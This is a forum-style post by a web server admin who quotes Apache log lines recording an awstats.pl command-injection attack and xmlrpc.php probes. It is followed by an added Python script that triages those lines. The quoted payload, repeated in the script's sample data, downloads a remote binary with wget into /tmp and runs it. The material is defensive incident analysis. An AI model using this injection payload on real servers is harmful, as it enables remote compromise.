I host a web server on Debian Sarge (kernel 2.6.13.2) and I recently spotted this in /var/log/apache/access.log:
63.76.208.71 - - [09/Nov/2005:14:24:42 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:44 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:46 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:47 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 200 780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:47 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:48 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:49 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:51 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:52 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:53 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:54 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:55 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
63.76.208.71 - - [09/Nov/2005:14:24:56 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
Yesterday, during the same kind of access, I saw this appear in /var/log/snort/alert:
[**] [1:721:8] VIRUS OUTBOUND bad file attachment [**]
[Classification: A suspicious filename was detected] [Priority: 2]
11/08-19:48:26.756271 192.168.0.123:34245 -> 212.27.48.4:25
TCP TTL:64 TOS:0x0 ID:29222 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x3B2BC401 Ack: 0x136FEC9A Win: 0x5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 176629 1064132463
Everything seems to be working, but I am wondering what the groups and permissions should be for the files that were probed (awstats.pl, the cgi-bin/ directory in general, etc.)?
Thanks for your help
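Added example, not code from the original post: a small triage script over the access.log lines quoted above. It parses the Apache combined-format records, percent-decodes the awstats.pl `configdir` parameter, splits out the injected shell pipeline (the classic awstats bug where a value beginning with `|` is handed to Perl's open() and run as a command), collects the remote addresses the payload references, and tells apart the requests that hit a non-existent path (404) from the one that actually reached a CGI and got a 200. The sample log is copied verbatim from the post; the field names and the `triage` summary structure are this example's own.

```python
"""Triage of the awstats.pl / xmlrpc.php probes in an Apache access.log.

Added example (not from the original post). Input lines below are copied
from the post; the parsing and summary layout are this script's own.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache combined format, with the extra trailing "-" field seen in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

# Log lines copied from the post above (attacker 63.76.208.71).
SAMPLE_LOG = [
    '63.76.208.71 - - [09/Nov/2005:14:24:42 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:44 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:46 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:47 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 200 780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:47 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:48 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:49 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:51 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:52 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:53 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:54 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:55 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
    '63.76.208.71 - - [09/Nov/2005:14:24:56 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"',
]


def parse_line(line):
    """Split one combined-format line into fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    parts = urlsplit(rec['target'])
    rec['path'], rec['query'] = parts.path, parts.query
    return rec


def query_params(query):
    """Decode a query string by hand so ';' inside a value survives
    (parse_qs on older Pythons treats ';' as a pair separator)."""
    params = {}
    for pair in query.split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def awstats_injection(rec):
    """Return the injected shell commands if this is an awstats.pl
    configdir pipe injection, otherwise None."""
    if not rec['path'].lower().endswith('awstats.pl'):
        return None
    for value in query_params(rec['query']).get('configdir', []):
        # A value opening with '|' is the pipe-open injection; the payload
        # closes it with a trailing '|' and chains commands with ';'.
        if value.startswith('|'):
            body = value.strip('|')
            return [cmd.strip() for cmd in body.split(';') if cmd.strip()]
    return None


def triage(lines):
    """Walk the log lines and build a small incident summary."""
    summary = {'sources': set(), 'injections': [], 'xmlrpc_probes': [],
               'remote_hosts': set(), 'unparsed': 0}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            summary['unparsed'] += 1
            continue
        summary['sources'].add(rec['ip'])
        cmds = awstats_injection(rec)
        if cmds is not None:
            summary['injections'].append({
                'ts': rec['ts'], 'path': rec['path'], 'status': rec['status'],
                'commands': cmds,
                # 200: a CGI really ran with this input. 404: the guessed
                # path did not exist, so nothing was executed.
                'reached_cgi': rec['status'] == 200,
            })
            for cmd in cmds:
                summary['remote_hosts'].update(IPV4_RE.findall(cmd))
        elif rec['method'] == 'POST' and rec['path'].endswith('xmlrpc.php'):
            summary['xmlrpc_probes'].append((rec['path'], rec['status']))
    return summary


if __name__ == '__main__':
    s = triage(SAMPLE_LOG)
    for ev in s['injections']:
        flag = 'REACHED CGI' if ev['reached_cgi'] else 'missed (404)'
        print(f"{ev['ts']} {ev['path']} -> {ev['status']} [{flag}]")
        for cmd in ev['commands']:
            print('    ', cmd)
    print('remote hosts to block / hunt for:', sorted(s['remote_hosts']))
    print('xmlrpc.php probes:', len(s['xmlrpc_probes']))
```

Of the three awstats attempts only the one against /cgi-bin/awstats.pl returned 200, so that is the request where a CGI actually consumed the attacker's `configdir`; whether the pipeline ran depends on the installed awstats version, so the things to check are a `listen` file in /tmp, any process with that name, and outbound connections to the two addresses the payload names. The xmlrpc.php POSTs all hit 404 and are just path guessing.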